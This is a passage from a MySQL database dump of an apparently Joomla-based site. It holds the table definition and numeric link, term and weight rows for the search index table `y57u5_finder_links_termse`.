(305, 326398, 1.00331),
(305, 326399, 1.07331),
(305, 326400, 1.02669),
(305, 326401, 1.00331),
(305, 326402, 1.07331),
(305, 326403, 1.02669),
(305, 326404, 1.14331),
(305, 326405, 0.91),
(305, 326406, 1.02669),
(305, 326407, 0.42),
(305, 326408, 1.05),
(305, 326409, 1.14331),
(305, 326410, 1.00331),
(305, 326411, 1.12),
(305, 326412, 2.00662),
(305, 326413, 2.19338),
(305, 326414, 2.45007),
(305, 326415, 3.15),
(305, 326416, 0.81669),
(305, 326417, 0.98),
(305, 326418, 0.98),
(305, 326419, 1.16669),
(305, 326420, 1.02669),
(305, 326421, 0.84),
(305, 326422, 0.91),
(305, 326423, 1.07331),
(305, 326424, 0.86331),
(305, 326425, 0.95669),
(306, 327876, 0.93331),
(306, 327877, 1.12),
(306, 327878, 0.84),
(306, 327879, 0.93331),
(306, 327880, 1.00331),
(306, 327881, 1.30669),
(306, 327882, 0.98),
(306, 327883, 1.12),
(306, 327884, 1.02669),
(306, 327885, 1.96),
(306, 327886, 0.98),
(306, 327887, 0.91),
(306, 327888, 0.95669),
(306, 327889, 1.14331),
(306, 327890, 1.00331),
(306, 327891, 0.95669),
(306, 327892, 1.96),
(306, 327893, 0.91),
(306, 327894, 1.00331),
(306, 327895, 1.05),
(306, 327896, 1.00331),
(306, 327897, 0.98),
(306, 327898, 1.07331),
(306, 327899, 0.98),
(306, 327900, 1.02669),
(306, 327901, 0.95669),
(306, 327902, 0.91),
(306, 327903, 1.02669),
(306, 327904, 0.74662),
(306, 327905, 1.09669),
(306, 327906, 1.21331),
(306, 327907, 1.00331),
(306, 327908, 1.14331),
(306, 327909, 1.09669),
(306, 327910, 0.95669),
(306, 327911, 0.86331),
(306, 327912, 0.95669),
(306, 327913, 0.95669),
(306, 327914, 1.07331),
(306, 327915, 0.95669),
(306, 327916, 1.02669),
(306, 327917, 0.86331),
(306, 327918, 1.00331),
(306, 327919, 0.91),
(306, 327920, 0.98),
(306, 327921, 1.00331),
(306, 327922, 0.95669),
(306, 327923, 1.05),
(306, 327924, 0.86331),
(306, 327925, 0.95669),
(306, 327926, 0.98),
(306, 327927, 0.98),
(306, 327928, 1.09669),
(306, 327929, 1.00331),
(306, 327930, 1.09669),
(306, 327931, 0.91),
(306, 327932, 1.02669),
(306, 327933, 0.37331),
(306, 327934, 1.02669),
(306, 327935, 1.21331),
(306, 327936, 1.02669),
(306, 327937, 0.84),
(306, 327938, 1.02669),
(306, 327939, 1.02669),
(306, 327940, 1.09669),
(306, 327941, 0.32669),
(306, 327942, 0.98),
(306, 327943, 1.02669),
(306, 327944, 0.93331),
(306, 327945, 1.00331),
(306, 327946, 0.98),
(306, 327947, 1.00331),
(306, 327948, 1.00331),
(306, 327949, 1.07331),
(306, 327950, 0.86331),
(306, 327951, 0.93331),
(308, 328945, 0.98),
(308, 328946, 1.07331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_termse`
--

CREATE TABLE `y57u5_finder_links_termse` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_termse`
--

INSERT INTO `y57u5_finder_links_termse` (`link_id`, `term_id`, `weight`) VALUES
(31, 162, 0.18669),
(250, 162, 0.18669),
(251, 162, 0.18669),
(306, 162, 0.18669),
(31, 163, 0.93331),
(250, 163, 0.93331),
(251, 163, 0.93331),
(31, 164, 1.00331),
(250, 164, 1.00331),
(251, 164, 1.00331),
(31, 165, 0.14),
(242, 165, 0.14),
(250, 165, 0.14),
(251, 165, 0.14),
(268, 165, 0.14),
(272, 165, 0.14),
(280, 165, 0.14),
(168, 165, 0.28),
(193, 165, 0.28),
(275, 165, 1.28),
(31, 166, 0.91),
(250, 166, 0.91),
(251, 166, 0.91),
(31, 167, 1.00331),
(250, 167, 1.00331),
(251, 167, 1.00331),
(31, 168, 0.23331),
(159, 168, 0.23331),
(160, 168, 0.23331),
(250, 168, 0.23331),
(251, 168, 0.23331),
(272, 168, 0.23331),
(280, 168, 0.23331),
(305, 168, 0.23331),
(306, 168, 0.23331),
(31, 169, 1.00331),
(159, 169, 1.00331),
(160, 169, 1.00331),
(250, 169, 1.00331),
(251, 169, 1.00331),
(31, 170, 1.26),
(160, 170, 1.26),
(250, 170, 1.26),
(251, 170, 1.26),
(159, 171, 0.18669),
(160, 171, 0.18669),
(178, 171, 0.18669),
(193, 171, 0.18669),
(235, 171, 0.18669),
(237, 171, 0.18669),
(238, 171, 0.18669),
(240, 171, 0.18669),
(249, 171, 0.18669),
(252, 171, 0.18669),
(254, 171, 0.18669),
(268, 171, 0.18669),
(273, 171, 0.18669),
(288, 171, 0.18669),
(299, 171, 0.18669),
(304, 171, 0.18669),
(31, 171, 0.37338),
(174, 171, 0.37338),
(242, 171, 0.37338),
(250, 171, 0.37338),
(251, 171, 0.37338),
(253, 171, 0.37338),
(267, 171, 0.37338),
(265, 171, 0.74676),
(266, 171, 0.74676),
(31, 172, 0.95669),
(250, 172, 0.95669),
(251, 172, 0.95669),
(31, 173, 1.14331),
(250, 173, 1.14331),
(251, 173, 1.14331),
(31, 174, 0.88669),
(159, 174, 0.88669),
(160, 174, 0.88669),
(250, 174, 0.88669),
(251, 174, 0.88669),
(31, 175, 1.00331),
(159, 175, 1.00331),
(160, 175, 1.00331),
(250, 175, 1.00331),
(251, 175, 1.00331),
(235, 176, 0.23331),
(237, 176, 0.23331),
(238, 176, 0.23331),
(243, 176, 0.23331),
(254, 176, 0.23331),
(265, 176, 0.23331),
(266, 176, 0.23331),
(269, 176, 0.23331),
(275, 176, 0.23331),
(287, 176, 0.23331),
(290, 176, 0.23331),
(298, 176, 0.23331),
(305, 176, 0.23331),
(308, 176, 0.23331),
(31, 176, 0.46662),
(159, 176, 0.46662),
(160, 176, 0.46662),
(236, 176, 0.46662),
(239, 176, 0.46662),
(240, 176, 0.46662),
(244, 176, 0.46662),
(247, 176, 0.46662),
(250, 176, 0.46662),
(251, 176, 0.46662),
(258, 176, 0.46662),
(272, 176, 0.46662),
(274, 176, 0.46662),
(280, 176, 0.46662),
(292, 176, 0.46662),
(178, 176, 0.69993),
(193, 176, 0.69993),
(306, 176, 0.93324),
(262, 176, 1.16655),
(31, 177, 0.95669),
(159, 177, 0.95669),
(160, 177, 0.95669),
(193, 177, 0.95669),
(236, 177, 0.95669),
(237, 177, 0.95669),
(250, 177, 0.95669),
(251, 177, 0.95669),
(269, 177, 0.95669),
(274, 177, 0.95669),
(306, 177, 0.95669),
(31, 178, 1.07331),
(159, 178, 1.07331),
(160, 178, 1.07331),
(250, 178, 1.07331),
(251, 178, 1.07331),
(31, 179, 0.93331),
(159, 179, 0.93331),
(160, 179, 0.93331),
(250, 179, 0.93331),
(251, 179, 0.93331),
(31, 180, 1.00331),
(159, 180, 1.00331),
(160, 180, 1.00331),
(250, 180, 1.00331),
(251, 180, 1.00331),
(31, 455, 0.18669),
(159, 455, 0.18669),
(160, 455, 0.18669),
(239, 455, 0.18669),
(245, 455, 0.18669),
(246, 455, 0.18669),
(250, 455, 0.18669),
(251, 455, 0.18669),
(252, 455, 0.18669),
(253, 455, 0.18669),
(255, 455, 0.18669),
(259, 455, 0.18669),
(260, 455, 0.18669),
(265, 455, 0.18669),
(266, 455, 0.18669),
(273, 455, 0.18669),
(275, 455, 0.18669),
(287, 455, 0.18669),
(299, 455, 0.18669),
(306, 455, 0.18669),
(242, 455, 0.37338),
(256, 455, 0.37338),
(257, 455, 0.37338),
(272, 455, 0.37338),
(280, 455, 0.37338),
(290, 455, 0.37338),
(292, 455, 0.37338),
(305, 455, 0.37338),
(237, 455, 0.56007),
(254, 455, 0.56007),
(262, 455, 0.56007),
(269, 455, 0.56007),
(288, 455, 0.56007),
(236, 455, 0.74676),
(240, 455, 0.74676),
(261, 455, 0.74676),
(193, 455, 1.12014),
(243, 455, 1.89357),
(241, 455, 2.05359),
(31, 456, 0.86331),
(159, 456, 0.86331),
(160, 456, 0.86331),
(239, 456, 0.86331),
(250, 456, 0.86331),
(251, 456, 0.86331),
(292, 456, 0.86331),
(31, 457, 0.95669),
(159, 457, 0.95669),
(160, 457, 0.95669),
(250, 457, 0.95669),
(251, 457, 0.95669),
(298, 458, 0.11655),
(301, 458, 0.18648),
(253, 458, 0.18669),
(299, 458, 0.20979),
(305, 458, 0.20979),
(304, 458, 0.30303),
(263, 458, 0.37338),
(264, 458, 0.37338),
(273, 458, 0.37338),
(247, 458, 0.56007),
(256, 458, 0.56007),
(233, 458, 0.74676),
(261, 458, 0.93345),
(265, 458, 0.93345),
(266, 458, 0.93345),
(267, 458, 0.93345),
(308, 458, 0.93345),
(168, 458, 1.12014),
(248, 458, 1.12014),
(255, 458, 1.12014),
(160, 458, 1.30683),
(275, 458, 1.30683),
(236, 458, 1.49352),
(262, 458, 1.49352),
(270, 458, 1.49352),
(292, 458, 1.49352),
(249, 458, 1.57353),
(31, 458, 1.68021),
(240, 458, 1.68021),
(250, 458, 1.68021),
(251, 458, 1.68021),
(269, 458, 1.68021),
(272, 458, 1.68021),
(280, 458, 1.68021),
(290, 458, 1.68021),
(237, 458, 1.8669),
(244, 458, 1.8669),
(259, 458, 1.8669),
(260, 458, 1.8669),
(246, 458, 2.05359),
(235, 458, 2.24028),
(258, 458, 2.24028),
(268, 458, 2.24028),
(274, 458, 2.24028),
(288, 458, 2.42697),
(178, 458, 2.61366),
(241, 458, 2.61366),
(257, 458, 2.61366),
(159, 458, 2.82702),
(239, 458, 2.98704),
(252, 458, 2.98704),
(254, 458, 2.98704),
(243, 458, 3.01371),
(174, 458, 3.54711),
(238, 458, 3.7338),
(193, 458, 4.66725),
(242, 458, 5.04063),
(306, 458, 5.97408),
(31, 459, 0.88669),
(193, 459, 0.88669),
(238, 459, 0.88669),
(250, 459, 0.88669),
(251, 459, 0.88669),
(262, 459, 0.88669),
(264, 459, 0.88669),
(304, 459, 0.88669),
(242, 459, 1.77338),
(31, 460, 1.07331),
(250, 460, 1.07331),
(251, 460, 1.07331),
(31, 461, 1.82),
(160, 461, 1.82),
(250, 461, 1.82),
(251, 461, 1.82),
(159, 461, 9.23),
(31, 462, 1.00331),
(159, 462, 1.00331),
(160, 462, 1.00331),
(250, 462, 1.00331),
(251, 462, 1.00331),
(31, 463, 1.00331),
(159, 463, 1.00331),
(160, 463, 1.00331),
(250, 463, 1.00331),
(251, 463, 1.00331),
(31, 464, 0.86331),
(242, 464, 0.86331),
(249, 464, 0.86331),
(250, 464, 0.86331),
(251, 464, 0.86331),
(252, 464, 0.86331),
(288, 464, 0.86331),
(31, 465, 0.93331),
(250, 465, 0.93331),
(251, 465, 0.93331),
(31, 466, 0.86331),
(159, 466, 0.86331),
(160, 466, 0.86331),
(174, 466, 0.86331),
(178, 466, 0.86331),
(233, 466, 0.86331),
(235, 466, 0.86331),
(246, 466, 0.86331),
(250, 466, 0.86331),
(251, 466, 0.86331),
(257, 466, 0.86331),
(258, 466, 0.86331),
(259, 466, 0.86331),
(260, 466, 0.86331),
(261, 466, 0.86331),
(265, 466, 0.86331),
(266, 466, 0.86331),
(268, 466, 0.86331),
(272, 466, 0.86331),
(274, 466, 0.86331),
(280, 466, 0.86331),
(292, 466, 0.86331),
(298, 466, 0.86331),
(305, 466, 0.86331),
(308, 466, 0.86331),
(241, 466, 1.72662),
(255, 466, 1.72662),
(270, 466, 1.72662),
(288, 466, 1.72662),
(301, 466, 1.72662),
(306, 466, 1.72662),
(193, 466, 2.58993),
(252, 466, 2.58993),
(304, 466, 3.45324),
(31, 467, 0.95669),
(159, 467, 0.95669),
(160, 467, 0.95669),
(174, 467, 0.95669),
(250, 467, 0.95669),
(251, 467, 0.95669),
(258, 467, 0.95669),
(270, 467, 0.95669),
(288, 467, 0.95669),
(301, 467, 0.95669),
(304, 467, 0.95669),
(31, 468, 0.88669),
(159, 468, 0.88669),
(160, 468, 0.88669),
(235, 468, 0.88669),
(250, 468, 0.88669),
(251, 468, 0.88669),
(31, 469, 1.00331),
(159, 469, 1.00331),
(160, 469, 1.00331),
(250, 469, 1.00331),
(251, 469, 1.00331),
(31, 470, 2.00662),
(159, 470, 2.00662),
(160, 470, 2.00662),
(250, 470, 2.00662),
(251, 470, 2.00662),
(31, 471, 1.07331),
(159, 471, 1.07331),
(160, 471, 1.07331),
(250, 471, 1.07331),
(251, 471, 1.07331),
(31, 472, 1.09669),
(159, 472, 1.09669),
(160, 472, 1.09669),
(250, 472, 1.09669),
(251, 472, 1.09669),
(31, 473, 0.86331),
(159, 473, 0.86331),
(160, 473, 0.86331),
(174, 473, 0.86331),
(239, 473, 0.86331),
(240, 473, 0.86331),
(250, 473, 0.86331),
(251, 473, 0.86331),
(264, 473, 0.86331),
(269, 473, 0.86331),
(306, 473, 0.86331),
(246, 473, 1.72662),
(252, 473, 1.72662),
(31, 474, 0.98),
(159, 474, 0.98),
(160, 474, 0.98),
(250, 474, 0.98),
(251, 474, 0.98),
(295, 475, 0.0525),
(161, 475, 0.28),
(298, 475, 0.2975),
(301, 475, 0.315),
(49, 475, 0.34),
(304, 475, 0.49),
(299, 475, 0.5425),
(287, 475, 0.7),
(305, 475, 0.77),
(255, 475, 1.4),
(168, 475, 1.68),
(31, 475, 1.82),
(245, 475, 1.82),
(249, 475, 1.82),
(251, 475, 1.82),
(261, 475, 1.82),
(265, 475, 1.96),
(266, 475, 1.96),
(269, 475, 1.96),
(272, 475, 1.96),
(280, 475, 1.96),
(248, 475, 2.1),
(290, 475, 2.1),
(159, 475, 2.24),
(160, 475, 2.24),
(263, 475, 2.24),
(233, 475, 2.38),
(308, 475, 2.38),
(270, 475, 2.52),
(246, 475, 2.54),
(237, 475, 2.8),
(252, 475, 2.8),
(250, 475, 2.96),
(253, 475, 3.08),
(267, 475, 3.22),
(268, 475, 3.22),
(247, 475, 3.52),
(256, 475, 3.64),
(264, 475, 3.78),
(259, 475, 4.06),
(260, 475, 4.06),
(257, 475, 4.2),
(273, 475, 4.26),
(292, 475, 4.34),
(262, 475, 4.48),
(244, 475, 4.54),
(174, 475, 4.62),
(241, 475, 4.76),
(236, 475, 4.9),
(288, 475, 4.9),
(274, 475, 5.04),
(275, 475, 5.22),
(235, 475, 5.62),
(243, 475, 5.76),
(254, 475, 5.88),
(258, 475, 6.3),
(178, 475, 7),
(238, 475, 7),
(239, 475, 7.7),
(240, 475, 7.84),
(193, 475, 8.26),
(242, 475, 8.68),
(306, 475, 8.98),
(31, 476, 0.91),
(159, 476, 0.91),
(160, 476, 0.91),
(250, 476, 0.91),
(251, 476, 0.91),
(31, 477, 1.09669),
(159, 477, 1.09669),
(160, 477, 1.09669),
(250, 477, 1.09669),
(251, 477, 1.09669),
(31, 478, 0.93331),
(159, 478, 0.93331),
(160, 478, 0.93331),
(250, 478, 0.93331),
(251, 478, 0.93331),
(31, 479, 1.05),
(159, 479, 1.05),
(160, 479, 1.05),
(250, 479, 1.05),
(251, 479, 1.05),
(31, 480, 0.88669),
(250, 480, 0.88669),
(251, 480, 0.88669),
(31, 481, 1.00331),
(250, 481, 1.00331),
(251, 481, 1.00331),
(257, 482, 0.88669),
(259, 482, 0.88669),
(260, 482, 0.88669),
(269, 482, 0.88669),
(272, 482, 0.88669),
(280, 482, 0.88669),
(288, 482, 0.88669),
(31, 482, 2.66007),
(159, 482, 2.66007),
(160, 482, 2.66007),
(250, 482, 2.66007),
(251, 482, 2.66007),
(31, 483, 1.12),
(159, 483, 1.12),
(160, 483, 1.12),
(250, 483, 1.12),
(251, 483, 1.12),
(31, 484, 1.16669),
(159, 484, 1.16669),
(160, 484, 1.16669),
(250, 484, 1.16669),
(251, 484, 1.16669),
(31, 485, 1.05),
(159, 485, 1.05),
(160, 485, 1.05),
(250, 485, 1.05),
(251, 485, 1.05),
(31, 486, 0.86331),
(159, 486, 0.86331),
(160, 486, 0.86331),
(238, 486, 0.86331),
(250, 486, 0.86331),
(251, 486, 0.86331),
(292, 486, 0.86331),
(306, 486, 0.86331),
(31, 487, 0.98),
(159, 487, 0.98),
(160, 487, 0.98),
(238, 487, 0.98),
(250, 487, 0.98),
(251, 487, 0.98),
(31, 488, 0.88669),
(159, 488, 0.88669),
(160, 488, 0.88669),
(240, 488, 0.88669),
(250, 488, 0.88669),
(251, 488, 0.88669),
(272, 488, 1.77338),
(280, 488, 1.77338),
(31, 489, 1.02669),
(159, 489, 1.02669),
(160, 489, 1.02669),
(250, 489, 1.02669),
(251, 489, 1.02669),
(31, 490, 0.95669),
(159, 490, 0.95669),
(160, 490, 0.95669),
(250, 490, 0.95669),
(251, 490, 0.95669),
(31, 491, 1.07331),
(159, 491, 1.07331),
(160, 491, 1.07331),
(250, 491, 1.07331),
(251, 491, 1.07331),
(31, 492, 1.00331),
(159, 492, 1.00331),
(160, 492, 1.00331),
(250, 492, 1.00331),
(251, 492, 1.00331),
(31, 493, 1.07331),
(159, 493, 1.07331),
(160, 493, 1.07331),
(250, 493, 1.07331),
(251, 493, 1.07331),
(31, 494, 0.86331),
(159, 494, 0.86331),
(160, 494, 0.86331),
(174, 494, 0.86331),
(242, 494, 0.86331),
(247, 494, 0.86331),
(250, 494, 0.86331),
(251, 494, 0.86331),
(258, 494, 0.86331),
(241, 494, 1.72662),
(31, 495, 0.93331),
(159, 495, 0.93331),
(160, 495, 0.93331),
(250, 495, 0.93331),
(251, 495, 0.93331),
(241, 496, 0.91),
(244, 496, 0.91),
(246, 496, 0.91),
(247, 496, 0.91),
(248, 496, 0.91),
(258, 496, 0.91),
(305, 496, 0.91),
(31, 496, 1.82),
(159, 496, 1.82),
(160, 496, 1.82),
(239, 496, 1.82),
(250, 496, 1.82),
(251, 496, 1.82),
(292, 496, 1.82),
(242, 496, 2.73),
(299, 496, 2.73),
(240, 496, 4.55),
(31, 497, 2.05338),
(159, 497, 2.05338),
(160, 497, 2.05338),
(250, 497, 2.05338),
(251, 497, 2.05338),
(298, 498, 0.02919),
(299, 498, 0.02919),
(305, 498, 0.02919),
(301, 498, 0.05838),
(31, 498, 0.23331),
(159, 498, 0.23331),
(160, 498, 0.23331),
(235, 498, 0.23331),
(236, 498, 0.23331),
(237, 498, 0.23331),
(244, 498, 0.23331),
(246, 498, 0.23331),
(250, 498, 0.23331),
(251, 498, 0.23331),
(256, 498, 0.23331),
(262, 498, 0.23331),
(272, 498, 0.23331),
(273, 498, 0.23331),
(275, 498, 0.23331),
(280, 498, 0.23331),
(287, 498, 0.23331),
(290, 498, 0.23331),
(292, 498, 0.23331),
(308, 498, 0.23331),
(178, 498, 0.46662),
(238, 498, 0.46662),
(240, 498, 0.46662),
(241, 498, 0.46662),
(242, 498, 0.46662),
(270, 498, 0.46662),
(274, 498, 0.46662),
(288, 498, 0.46662),
(306, 498, 0.46662),
(248, 498, 0.69993),
(264, 498, 0.69993),
(239, 498, 0.93324),
(253, 498, 0.93324),
(243, 498, 1.39986),
(174, 498, 3.03303),
(31, 499, 1.07331),
(159, 499, 1.07331),
(160, 499, 1.07331),
(250, 499, 1.07331),
(251, 499, 1.07331),
(31, 500, 1.16669),
(159, 500, 1.16669),
(160, 500, 1.16669),
(250, 500, 1.16669),
(251, 500, 1.16669),
(31, 501, 0.23331),
(159, 501, 0.23331),
(160, 501, 0.23331),
(250, 501, 0.23331),
(251, 501, 0.23331),
(252, 501, 0.23331),
(255, 501, 0.23331),
(262, 501, 0.23331),
(306, 501, 0.46662),
(193, 501, 0.69993),
(242, 501, 2.56641),
(31, 502, 0.88669),
(159, 502, 0.88669),
(160, 502, 0.88669),
(250, 502, 0.88669),
(251, 502, 0.88669),
(242, 502, 1.77338),
(31, 503, 0.95669),
(159, 503, 0.95669),
(160, 503, 0.95669),
(250, 503, 0.95669),
(251, 503, 0.95669),
(295, 504, 0.02331),
(305, 504, 0.02331),
(304, 504, 0.06993),
(299, 504, 0.09324),
(31, 504, 0.18669),
(159, 504, 0.18669),
(160, 504, 0.18669),
(233, 504, 0.18669),
(236, 504, 0.18669),
(246, 504, 0.18669),
(250, 504, 0.18669),
(251, 504, 0.18669),
(252, 504, 0.18669),
(261, 504, 0.18669),
(262, 504, 0.18669),
(265, 504, 0.18669),
(266, 504, 0.18669),
(268, 504, 0.18669),
(269, 504, 0.18669),
(273, 504, 0.18669),
(193, 504, 0.37338),
(237, 504, 0.37338),
(238, 504, 0.37338),
(245, 504, 0.37338),
(249, 504, 0.37338),
(255, 504, 0.37338),
(258, 504, 0.37338),
(274, 504, 0.37338),
(287, 504, 0.37338),
(288, 504, 0.37338),
(292, 504, 0.37338),
(247, 504, 0.56007),
(263, 504, 0.56007),
(178, 504, 0.74676),
(235, 504, 0.74676),
(241, 504, 0.74676),
(256, 504, 0.93345),
(243, 504, 1.12014),
(306, 504, 1.12014),
(254, 504, 1.49352),
(239, 504, 1.68021),
(240, 504, 1.68021),
(242, 504, 2.24028),
(31, 505, 0.86331),
(159, 505, 0.86331),
(160, 505, 0.86331),
(178, 505, 0.86331),
(193, 505, 0.86331),
(235, 505, 0.86331),
(240, 505, 0.86331),
(250, 505, 0.86331),
(251, 505, 0.86331),
(256, 505, 0.86331),
(263, 505, 0.86331),
(273, 505, 0.86331),
(299, 505, 0.86331),
(304, 505, 0.86331),
(241, 505, 1.72662),
(243, 505, 1.72662),
(255, 505, 1.72662),
(258, 505, 1.72662),
(242, 505, 2.58993),
(306, 505, 2.58993),
(239, 505, 3.45324),
(31, 506, 0.95669),
(159, 506, 0.95669),
(160, 506, 0.95669),
(241, 506, 0.95669),
(242, 506, 0.95669),
(250, 506, 0.95669),
(251, 506, 0.95669),
(258, 506, 0.95669),
(306, 506, 1.91338),
(298, 507, 0.02331),
(305, 507, 0.02331),
(299, 507, 0.04662),
(31, 507, 0.18669),
(159, 507, 0.18669),
(160, 507, 0.18669),
(178, 507, 0.18669),
(236, 507, 0.18669),
(242, 507, 0.18669),
(243, 507, 0.18669),
(246, 507, 0.18669),
(247, 507, 0.18669),
(248, 507, 0.18669),
(250, 507, 0.18669),
(251, 507, 0.18669),
(256, 507, 0.18669),
(257, 507, 0.18669),
(272, 507, 0.18669),
(274, 507, 0.18669),
(275, 507, 0.18669),
(280, 507, 0.18669),
(290, 507, 0.18669),
(308, 507, 0.18669),
(174, 507, 0.37338),
(238, 507, 0.37338),
(258, 507, 0.37338),
(267, 507, 0.37338),
(269, 507, 0.37338),
(239, 507, 0.56007),
(254, 507, 0.56007),
(240, 507, 0.74676),
(306, 507, 0.74676),
(241, 507, 0.93345),
(262, 507, 0.93345),
(288, 507, 1.49352),
(263, 507, 2.05359),
(31, 508, 0.86331),
(159, 508, 0.86331),
(160, 508, 0.86331),
(250, 508, 0.86331),
(251, 508, 0.86331),
(258, 508, 0.86331),
(31, 509, 0.95669),
(159, 509, 0.95669),
(160, 509, 0.95669),
(250, 509, 0.95669),
(251, 509, 0.95669),
(295, 510, 0.02338),
(301, 510, 0.12859),
(298, 510, 0.16867),
(299, 510, 0.24549),
(31, 510, 0.27993),
(250, 510, 0.27993),
(251, 510, 0.27993),
(305, 510, 0.32732),
(304, 510, 0.3507),
(159, 510, 0.37324),
(160, 510, 0.37324),
(161, 510, 0.37324),
(287, 510, 0.37324),
(256, 510, 0.46655),
(248, 510, 0.65317),
(235, 510, 0.74648),
(237, 510, 0.74648),
(245, 510, 0.74648),
(257, 510, 0.74648),
(264, 510, 0.83979),
(288, 510, 0.83979),
(249, 510, 0.9331),
(267, 510, 0.9331),
(253, 510, 1.02641),
(270, 510, 1.02641),
(236, 510, 1.11972),
(263, 510, 1.11972),
(246, 510, 1.21303),
(247, 510, 1.30634),
(255, 510, 1.30634),
(265, 510, 1.30634),
(266, 510, 1.30634),
(275, 510, 1.30634),
(308, 510, 1.34633),
(259, 510, 1.39965),
(260, 510, 1.39965),
(261, 510, 1.39965),
(290, 510, 1.39965),
(268, 510, 1.49296),
(272, 510, 1.58627),
(280, 510, 1.58627),
(273, 510, 1.62626),
(168, 510, 1.67958),
(252, 510, 1.67958),
(233, 510, 1.69291),
(274, 510, 1.69291),
(244, 510, 1.77289),
(178, 510, 1.8662),
(243, 510, 1.8662),
(254, 510, 1.8662),
(269, 510, 1.8662),
(174, 510, 1.95951),
(292, 510, 1.95951),
(258, 510, 2.05282),
(238, 510, 2.14613),
(241, 510, 2.14613),
(262, 510, 2.23944),
(193, 510, 2.74598),
(239, 510, 4.23894),
(240, 510, 4.51887),
(306, 510, 5.03874),
(242, 510, 5.91852),
(31, 511, 0.91),
(159, 511, 0.91),
(160, 511, 0.91),
(249, 511, 0.91),
(250, 511, 0.91),
(251, 511, 0.91),
(261, 511, 0.91),
(298, 511, 0.91),
(308, 511, 0.91),
(31, 512, 1.00331),
(159, 512, 1.00331),
(160, 512, 1.00331),
(250, 512, 1.00331),
(251, 512, 1.00331),
(31, 513, 0.84),
(159, 513, 0.84),
(160, 513, 0.84),
(250, 513, 0.84),
(251, 513, 0.84),
(306, 513, 0.84),
(31, 514, 0.95669),
(159, 514, 0.95669),
(160, 514, 0.95669),
(250, 514, 0.95669),
(251, 514, 0.95669),
(31, 515, 0.93331),
(159, 515, 0.93331),
(160, 515, 0.93331),
(250, 515, 0.93331),
(251, 515, 0.93331),
(257, 515, 0.93331),
(31, 516, 0.28),
(250, 516, 0.28),
(251, 516, 0.28),
(31, 517, 1.00331),
(250, 517, 1.00331),
(251, 517, 1.00331),
(31, 518, 1.19),
(250, 518, 1.19),
(251, 518, 1.19),
(31, 519, 0.14),
(241, 519, 0.14),
(250, 519, 0.14),
(251, 519, 0.14),
(253, 519, 0.14),
(259, 519, 0.14),
(260, 519, 0.14),
(265, 519, 0.14),
(266, 519, 0.14),
(31, 520, 0.86331),
(250, 520, 0.86331),
(251, 520, 0.86331),
(31, 521, 1.12),
(250, 521, 1.12),
(251, 521, 1.12),
(159, 1122, 0.93331),
(160, 1122, 0.93331),
(174, 1122, 0.93331),
(254, 1122, 0.93331),
(263, 1122, 0.93331),
(265, 1122, 1.86662),
(266, 1122, 1.86662),
(193, 1122, 2.79993),
(159, 1123, 1.21331),
(160, 1123, 1.21331),
(159, 1124, 0.88669),
(160, 1124, 0.88669),
(159, 1125, 0.95669),
(160, 1125, 0.95669),
(159, 1126, 0.88669),
(160, 1126, 0.88669),
(263, 1126, 0.88669),
(288, 1126, 0.88669),
(306, 1126, 0.88669),
(159, 1127, 0.95669),
(160, 1127, 0.95669),
(159, 1128, 0.95669),
(160, 1128, 0.95669),
(159, 1129, 1.12),
(160, 1129, 1.12),
(159, 1130, 0.81669),
(160, 1130, 0.81669),
(174, 1130, 0.81669),
(193, 1130, 0.81669),
(241, 1130, 0.81669),
(243, 1130, 0.81669),
(247, 1130, 0.81669),
(248, 1130, 0.81669),
(253, 1130, 0.81669),
(258, 1130, 0.81669),
(259, 1130, 0.81669),
(260, 1130, 0.81669),
(263, 1130, 0.81669),
(265, 1130, 0.81669),
(266, 1130, 0.81669),
(270, 1130, 0.81669),
(272, 1130, 0.81669),
(273, 1130, 0.81669),
(274, 1130, 0.81669),
(275, 1130, 0.81669),
(280, 1130, 0.81669),
(290, 1130, 0.81669),
(301, 1130, 0.81669),
(235, 1130, 1.63338),
(237, 1130, 1.63338),
(238, 1130, 1.63338),
(261, 1130, 1.63338),
(288, 1130, 1.63338),
(299, 1130, 1.63338),
(178, 1130, 2.45007),
(262, 1130, 2.45007),
(268, 1130, 2.45007),
(304, 1130, 2.45007),
(246, 1130, 3.26676),
(306, 1130, 3.26676),
(242, 1130, 6.06684),
(239, 1130, 6.88353),
(240, 1130, 9.3336),
(159, 1131, 0.93331),
(160, 1131, 0.93331),
(237, 1187, 0.07),
(244, 1187, 0.07),
(255, 1187, 0.07),
(258, 1187, 0.07),
(287, 1187, 0.07),
(292, 1187, 0.07),
(193, 1187, 0.14),
(238, 1187, 0.14),
(239, 1187, 0.14),
(240, 1187, 0.14),
(262, 1187, 0.14),
(304, 1187, 0.14),
(305, 1187, 0.14),
(235, 1187, 0.21),
(247, 1187, 0.21),
(264, 1187, 0.21),
(299, 1187, 0.21),
(242, 1187, 0.24),
(249, 1187, 0.24),
(168, 1187, 0.28),
(236, 1187, 0.28),
(246, 1187, 0.28),
(161, 1187, 0.37),
(178, 1187, 0.42),
(243, 1187, 0.42),
(161, 1388, 0.23331),
(193, 1388, 0.23331),
(242, 1388, 0.23331),
(246, 1388, 0.23331),
(306, 1388, 0.23331),
(161, 1391, 0.46669),
(235, 1391, 0.46669),
(242, 1391, 0.46669),
(245, 1391, 0.46669),
(263, 1391, 0.46669),
(272, 1391, 0.46669),
(280, 1391, 0.46669),
(262, 1702, 0.37331),
(161, 1702, 3.41312),
(161, 1718, 0.23331),
(238, 1718, 0.23331),
(240, 1718, 0.23331),
(261, 1718, 0.46662),
(236, 2259, 0.18669),
(250, 2259, 0.18669),
(251, 2259, 0.56007),
(168, 10326, 0.07),
(174, 10326, 0.07),
(178, 10326, 0.07),
(243, 10326, 0.07),
(248, 10326, 0.07),
(249, 10326, 0.07),
(255, 10326, 0.07),
(262, 10326, 0.07),
(263, 10326, 0.07),
(287, 10326, 0.07),
(299, 10326, 0.07),
(304, 10326, 0.07),
(305, 10326, 0.07),
(193, 10326, 0.14),
(235, 10326, 0.14),
(240, 10326, 0.14),
(236, 10326, 0.21),
(273, 10326, 0.21),
(238, 10326, 0.28),
(246, 10326, 0.35),
(247, 10326, 0.35),
(250, 10326, 0.37),
(262, 10369, 0.88669),
(250, 10369, 7.22019),
(252, 12821, 0.91),
(254, 12821, 0.91),
(265, 12821, 1.82),
(266, 12821, 1.82),
(252, 12822, 1.00331),
(265, 12822, 1.00331),
(266, 12822, 1.00331),
